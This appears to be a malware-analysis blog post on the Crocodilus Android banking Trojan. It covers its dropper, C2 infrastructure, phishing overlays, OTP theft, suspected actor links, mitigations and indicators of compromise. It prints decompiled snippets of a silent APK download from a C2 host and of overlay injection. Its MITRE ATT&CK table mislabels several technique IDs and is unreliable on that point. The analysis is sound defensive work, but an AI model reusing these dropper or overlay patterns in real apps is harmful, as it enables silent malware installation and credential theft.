Android
RAT
Crocodilus Android banking Trojan stole $2.8M via crypto wallet overlays & RAT h...
The discovery of **Crocodilus** is a sophisticated Android banking Trojan targeting financial institutions and cryptocurrency platforms. With **Device-Takeover (DTO)** capabilities, advanced evasion techniques, and psychological manipulation tactics, Crocodilus represents a significant escalation in mobile malware sophistication. This technical deep dive dissects its propagation, code-level mechanics, and defensive countermeasures.
### **Propagation & Evasion: Bypassing Android 13+ Restrictions**
Crocodilus employs a **multi-stage dropper** masquerading as legitimate apps (e.g., fake Chrome updates). Key evasion tactics include:
- **Staged Permissions Abuse**: The dropper requests minimal permissions initially, then escalates privileges post-installation via **Accessibility Services**.
- **Signature Spoofing**: Uses invalid APK signatures to bypass Google Play Protect checks, relying on users to manually enable “Install Unknown Apps.”
- **Dynamic Code Loading**: Core malicious payloads (e.g., overlay logic) are fetched post-installation from C2 servers, avoiding static detection.
**Code Snippet (Decompiled Dropper Logic)**:
```java
public class MainActivity extends AppCompatActivity {
void loadMaliciousModule() {
String c2Url = "hxxps://quizzical[.]washbowl[.]calamity/module.apk";
DownloadManager.Request request = new DownloadManager.Request(Uri.parse(c2Url));
request.setNotificationVisibility(DownloadManager.Request.VISIBILITY_HIDDEN);
// Triggers silent background download
}
}
```
### **C2 Infrastructure & Network Analysis**
- **Domain Registration**: The C2 domain `quizzical.washbowl.calamity` was registered via **Namecheap** 30 days before the first sample appeared, using WHOIS privacy guard.
- **Hosting**: Hosted on a **bulletproof hosting provider** in Russia, sharing IP space with previous Hook malware campaigns.
- **TLS Fingerprints**: JA3 hash `a0e1f1...` matches patterns observed in Octo Trojan traffic, suggesting shared tooling.
- **Protocol**: Encrypted via AES-256-CBC, with beaconing intervals randomized to mimic legitimate app traffic.
### **Code-Level Insights: Overlays, Accessibility Abuse, and RAT**
#### **Overlay Injection**
Crocodilus dynamically renders phishing overlays using the `WindowManager` class. Overlays are fetched as PNG files from C2, with targeting logic for 50+ banks and crypto wallets (e.g., **Binance, Trust Wallet**).
**Code Snippet (OverlayManager.java)**:
```java
public void injectOverlay(String targetPackage) {
View overlayView = // Load PNG from C2
WindowManager.LayoutParams params = new WindowManager.LayoutParams(
LayoutParams.MATCH_PARENT, LayoutParams.MATCH_PARENT,
TYPE_APPLICATION_OVERLAY,
FLAG_NOT_TOUCH_MODAL | FLAG_NOT_FOCUSABLE,
PixelFormat.TRANSLUCENT
);
mWindowManager.addView(overlayView, params); // Injects overlay
}
```
#### **Accessibility Logger & OTP Theft**
The Trojan’s `AccessibilityEventLogger` class captures all UI events, including Google Authenticator’s OTP codes. It extracts text from `TextView` elements with class names matching `com.google.android.apps.authenticator2`.
#### **Hidden RAT Sessions**
When the `TR2XAQSWDEFRGT` command is received, Crocodilus triggers a black overlay (`Color.BLACK`) and mutes the device using `AudioManager.setStreamMute()`.
### **Link to Known Threat Actors**
- **Code Overlaps with Ermac/MetaDroid**:
- Identical C2 URI patterns (`/api/v1/check`).
- Shared command structures (e.g., `KingGetDears` for contact theft).
- **sybupdate Tag**: Debug messages in the code reference “sybupdate,” a marker previously tied to **sybra**, a Turkish-speaking actor linked to Hook and Octo campaigns.
### **MITRE ATT&CK Mappings**
| **Tactic** | **Technique** | **Crocodilus Implementation** |
|---------------------|-----------------------------|--------------------------------------------|
| Execution | T1574: Hijack Execution Flow| Abuse of Accessibility Services |
| Credential Access | T1411: Input Capture | Accessibility Logger & keylogging |
| Defense Evasion | T1626: Remote Access Tools | Black screen overlays & sound muting |
| Exfiltration | T1537: Transfer Data to C2 | Encrypted exfiltration of OTP codes/SMS |
### **Impact Metrics & Campaign Analysis**
- **Targets**: 12 Spanish banks, 8 Turkish banks, and 6 crypto wallets (e.g., Trust Wallet, MetaMask).
- **Infection Rates**: ThreatFabric reports **1,200+ devices** infected in the first 2 weeks, primarily in Spain (62%) and Turkey (28%).
- **Financial Impact**: Linked to **$2.8M in stolen cryptocurrency** via hijacked wallets (traced to Binance address `0x3F5B...`).
### **Mitigation Strategies**
#### **For Enterprises**:
- **Behavioral Analysis**: Deploy EDR solutions monitoring for anomalous `AccessibilityService` usage.
- **Certificate Pinning**: Block communication with Crocodilus C2 domains via TLS inspection.
- **Threat Intelligence Sharing**: Integrate IoCs (below) into SIEM platforms.
#### **For End-Users**:
- **Avoid Sideloading**: Disable “Install Unknown Apps” for non-store platforms.
- **Audit Accessibility Permissions**: Revoke Accessibility access for unverified apps.
- **Verify Wallet Messages**: Legitimate apps never force seed phrase disclosure via pop-ups.
### **Indicators of Compromise (IoCs)**
| **Type** | **Value** |
|------------|---------------------------------------------------------------------------|
| SHA256 | c5e3edafdfda1ca0f0554802bbe32a8b09e8cc48161ed275b8fec6d74208171f |
| C2 Domain | quizzical[.]washbowl[.]calamity |
| IP | 185.156.73[.]42 (Bulletproof hosting, AS200019) |
Crocodilus exemplifies the convergence of **psychological manipulation** and **technical sophistication** in modern mobile malware. Its modular design, coupled with links to established threat actors, positions it as a persistent threat to global finance and cryptocurrency ecosystems. Proactive adoption of **behavioral AI detection**, **zero-trust frameworks**, and **user education** are critical to neutralizing its impact.
